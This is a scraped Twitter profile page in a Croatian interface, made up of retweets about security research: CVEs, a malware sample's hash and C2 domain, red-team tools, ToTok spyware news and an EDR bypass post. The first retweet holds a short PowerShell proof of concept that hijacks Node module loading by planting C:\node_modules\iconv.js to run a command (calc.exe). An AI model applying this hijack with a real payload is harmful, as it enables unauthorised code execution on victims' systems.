Tweetovi

Blokirali ste korisnika/cu @cengizhansahin

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @cengizhansahin

  1. proslijedio/la je Tweet
    5. velj

    Node module hijack in . PoC (PS): New-Item -Type Directory -Path "C:\node_modules" Set-Content "C:\node_modules\iconv.js" -Encoding ASCII "const {exec} = require('child_process')`nexec('calc.exe').unref()" & "$env:ProgramFiles\\ubuntu-server.exe"

    Poništi
  2. proslijedio/la je Tweet
    2. velj

    Hi I'm looking for a security contact, but can't seem to find it on your site. Can you direct me to it? Thanks

    Poništi
  3. proslijedio/la je Tweet

    Yellowstone steaming the Milky Way & Jupiter. Great photo Lori Jacobs!

    Poništi
  4. proslijedio/la je Tweet
    27. sij

    Tax declaration around the corner and actors know that. New sample masquerading as , the 🇪🇸 Spanish tax agency Sha256: 3aa514568cfbd3af7b884d9a1f2f0ea2dd54d29deca70408f8105b14de870646 C2: bilbaobbva[.]com

    Poništi
  5. proslijedio/la je Tweet
    21. sij

    Just released Satellite, a payload hosting and proxy software for red team operations. In the blog post, I discuss the feature set of Satellite as well as why an operator would choose it over Apache or Nginx.

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    20. sij
    Poništi
  7. proslijedio/la je Tweet
    15. sij

    Just published a blog explaining the root cause of the recent crypto vulnerability (CVE-2020-0601 / ?) using some "Load Bearing Analogies" to make it more accessible. CC:

    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet
    16. sij

    Scoop: FBI says nation-state actors have breached two US municipalities * Hackers used the CVE-2019-0604 SharePoint vulnerability * Cities were not named * Chinese APTs have historically abused this bug last year

    Poništi
  9. proslijedio/la je Tweet
    9. sij

    I'm very excited to share my blogpost series (including PoC code) about a remote, interactionless iPhone exploit over iMessage:

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    2. sij

    The guy behind ToTok appears to be our old friend, Tahnoon bin Zayed, who (in)famously bought a spyware system (via his company Mauqah Technology) from Italian surveillance vendor Hacking Team in 2012, which was used to target dissidents including Ahmed Mansoor.

    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    6. sij

    Google allowed ToTok back into its Google Play store over the weekend, despite the fact that the intel community insists the chat app is a spy tool for the UAE and ToTok is trying to bribe journalists into saying good things about it 👇

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    5. sij

    A more in-depth look at the defacement. Went through a short history of the site, fingerprinted plugin versions, and reviewed a probable attack vector.

    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    5. sij

    Consider: millions of years ago our antecedents gave a massive sacrifice of their left hemisphere. We lost a tremendous amount of short term memory and replaced it with Broca’s, Wernicke & the phonological loop. But why? So we can—talk. Thus chimpanzees can do this—we can’t:

    Prikaži ovu nit
    Poništi
  14. proslijedio/la je Tweet
    3. sij

    The offensive security community means a lot to me. Following 's great thread that injected some much needed infosec positivity, I wanted to highlight a few (offensive-ish) posts/talks that my team and myself enjoyed over the last year or so.

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    29. pro 2019.

    AlienVault Agent for Windows versions prior to 19.07.0803.0301 also install Osquery in ProgramData and are thus affected by this issue

    Poništi
  16. proslijedio/la je Tweet
    29. pro 2019.

    Proof of concept PowerShell module for CVE-2019-3567 - Osquery for Windows access right misconfiguration Elevation of Privilege, discovered by

    Poništi
  17. proslijedio/la je Tweet
    28. pro 2019.

    After is excellent write up I could not resist to blog nostalgically about red teaming ~10 years ago. :

    Poništi
  18. proslijedio/la je Tweet
    23. pro 2019.
    Poništi
  19. proslijedio/la je Tweet
    24. pro 2019.

    There are 2 types of people, those who are writing and sharing tooling, publishing research and building innovative solutions to protect systems... and those who argue about OST on Twitter because they can’t. Choose your path.

    Poništi
  20. proslijedio/la je Tweet
    21. pro 2019.

    A post I wrote in 2017 on bypassing CarbonBlack all products, since the trick is still unfixed, decided to public it..

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·